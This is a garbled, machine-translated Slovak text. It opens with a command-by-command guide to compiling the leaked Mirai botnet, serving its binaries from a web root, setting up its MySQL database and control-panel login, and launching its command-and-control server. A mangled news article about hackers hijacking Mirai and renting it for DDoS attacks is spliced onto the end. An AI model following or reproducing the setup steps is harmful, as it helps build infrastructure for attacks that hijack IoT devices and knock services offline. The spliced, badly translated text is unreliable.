# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv krížový kompilátor-armv6l armv6l
# export PATH=$PATH:/etc/xcompile/armv4l/bin
# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documents/go
# prejdite na github.com/go-sql-driver/mysql
# prejdite na github.com/mattn/go-shellwords
Posratý.
# cd Mirai-Source-Code-master/mirai
# ./build.sh ladenie telnetu
# ./build.sh uvoľní telnet
# mv mirai* /var/www/html
# cd /var/www/html
#mkdirbins
#mv*bins/
#cd
Teraz MySQL.
# mysql -u root -p
Tu budete požiadaní o heslo. Zadajte heslo, ktoré bolo predtým nastavené.
# vytvoriť databázu mirai;
# použite mirai
Teraz skopírujeme celý text sem - https://pastebin.com/QVD48J8s, vložte a embosujte Enter.
Text skopírujeme sem - https://pastebin.com/JwYSgE4v
Namiesto anna-senpai napíšte svoje prihlasovacie meno. Hocičo.
To isté s mäkkým vstupom. Tieto údaje budú potrebné na to, aby sme mali prístup k riadiacemu panelu robota.
Môže to byť takto - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");
Kopírovať, prilepiť, embosovať Enter.
Teraz sa môžete prihlásiť.
# VÝCHOD
Všetko je už super.
# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# obrazovka ./cnc
Napíšte, že MySQL DB je otvorená
Túto reláciu nezatvárame, otvárame novú.
http://prntscr.com/gcxunx Namiesto vlmi.su napíšte svoju doménu a pečiatku Open.
Zadajte svoje prihlasovacie meno a heslo, v mojom poli je -
pizdec
zaebalsjapisatj
zaebalsjapisatj Minulý mesiac došlo k početným útokom na skvelé webové stránky, as Twitter či Spotify, čo ich okamžite vyviedlo z harmónie. Pre koho sú vikoristi celý botnet? Mirai , ktorý spotrebuje 400-500 tisíc zariadení na internete prejavov Teraz novinári na základnej doske zistili , že dvaja hackeri dokázali prevziať kontrolu nad botnetom a vytvoriť jeho novú verziu -- už kombinujúc milión zariadení . Predplatitelia nemeckého poskytovateľa si to mohli vyskúšať na vlastnej koži Deutsche Telekom
, opatrenie, ktoré minulý víkend nefungovalo.
Polyuvannaya na Mirai
Novinári sa mohli porozprávať s jedným z dvoch týchto tajných hackerov – s tým, ktorý má prezývku BestBuy. Šifrovaný online chat odhalil, že medzi útočníkmi sa rozhorel skutočný boj o kontrolu nad Mirai. Nedávno sa zistilo, že váš softvér sa rozlial. Tieto útoky mohli umožniť spoločnosti BestBuy a jej partnerovi Popopret chcieť kontrolu nad väčšinou botnetu a pridať doň nové zariadenia.
Predtým sa naši odborníci naučili kód pre botnet Mirai - ukázalo sa, že nebol vytvorený špeciálne pre zariadenia na internete prejavov. Nechutný softvér hľadá pripojenia k toľkým zariadeniam, ktoré majú predvolené prihlasovacie heslá (admin:admin, root:password atď.). To znamená, že teoreticky môžu do tohto skladu vstúpiť akékoľvek zariadenia, vrátane domácich počítačov, serverov alebo smerovačov. IoT zariadenia - zavolajte na router - vstúpte do skladu kým nie je znovu milovaný - potom sa červ vymaže z pamäte. Botnet však neustále skenuje internet, či neobsahuje škodlivé zariadenia, takže zariadenia, ktoré sa „nakazili vírusom“, sa môžu rýchlo stať jeho súčasťou. Medzi hackermi sa rozhorel zúrivý boj o to, kto ako prvý infikuje čo najviac zariadení.
Chýbajú informácie o tom, ako sú tvorcovia nového Mirai pred svojimi konkurentmi. Prote stinks novinárom povedal, že používajú výkonný botnet na skenovanie potenciálne unikajúcich zariadení vrátane tých, ktoré boli predtým súčasťou botnetu.
„Prečo nezablatiť Mirai, nezaliať Mirai a nezničiť originál,“ hovorí BestBuy.
Nielen Mirai
Prote new botnet zničí staré zariadenia s Mirai a nové s predvolenými heslami. Jeho tvorcovia tiež obhajujú 0-dňové aktualizácie firmvéru IoT zariadení. Odborníci predtým predpovedali vznik takýchto „kombinovaných“ botnetov vo Švédsku.
Boj proti nim sa stáva čoraz komplikovanejším – keďže na to, aby prežilo Mirai, samotné najvýkonnejšie koncové zariadenie potrebuje na prístup k novému iba zmeniť prihlasovacie meno a heslo, potom to z dôvodu zraniteľnosti modulu gadget nebude možné vstúpiť samostatne.
DDoS rýchlosťou 700 Gbit/s
Hackeri BestBuy a Popopret začali inzerovať svoje služby – pokúšajú sa inzerovať prístup k svojej novej verzii Mirai, čím zvyšujú množstvo spamových správ cez XMPP/Jabber,
Za slovami hackera sa na poslancov prenáša smrad z množstva balíkov služieb. Lacnejšia cena $2 000 - za tieto malé peniaze si klienti môžu prenajať 20 000 až 25 000 uzly botnetu na spustenie vojen až na dva roky s hodinovou prestávkou medzi útokmi na pätnásť rokov. vzadu $15 000 alebo iný $20 000 Poslanci odhadujú schopnosť až 600 000 botov spustiť dvojročné útoky s 30 alebo 15 prerušeniami. V ďalšej epizóde sa intenzita útoku stáva intenzívnejšou 700 Gbit/s alebo viac.
Perspektívy
Bezpečnosť IoT zariadenia sú často na nízkej úrovni – vysvetľuje to skutočnosť, že predajcovia často nemajú žiadne znalosti o pokročilom prístupe k informačnej bezpečnosti. Inzerujú jednoduchosť používania svojich produktov a ukladajú náklady a plytvajú zdrojmi na dodatočné vstupy.
Ako už bolo povedané vyššie, väčšinu botnetov môžu ukradnúť iba distribútori koncových zariadení alebo poskytovatelia, ktorí ich dodávajú (napríklad routery). Nemecký poskytovateľ Deutsche Telekom, ktorý utrpel útokom novej verzie Mirai, už oznámil, že sa s majiteľmi vysypaných routerov „pozrie na novinky“. Speedport, spoločnosť arkádsky.
Zvýšiť úroveň bezpečnosti reči na internete bude možné dodatočnou implementáciou prísnej kontroly zariadení na strane poskytovateľov na jednej strane a vývojom štandardov a regulačnej dokumentácie pre IoT na strane druhej. Podobné prístupy už boli použité v mnohých krajinách na zaistenie bezpečnosti automatizovaných systémov riadenia procesov. Prvé kroky v tomto smere sú už zrealizované – napríklad viacero IT predajcov zverejnilo dokument pod názvom Rámec bezpečnosti priemyselného internetu (IISF)- Niektorí ľudia zvažujú dôležitosť internetu prejavov ako súčasti „priemyselného internetu“.
Prote, zvyšková výživa je ešte ďaleko, a hackeri BestBuy a Popopret môže odobrať monopol na vykonávanie veľkých DDoS útoky v strede. Toto je prekvapivý fakt o samotných zločincoch, pod hodinou nepokoja Základná doska
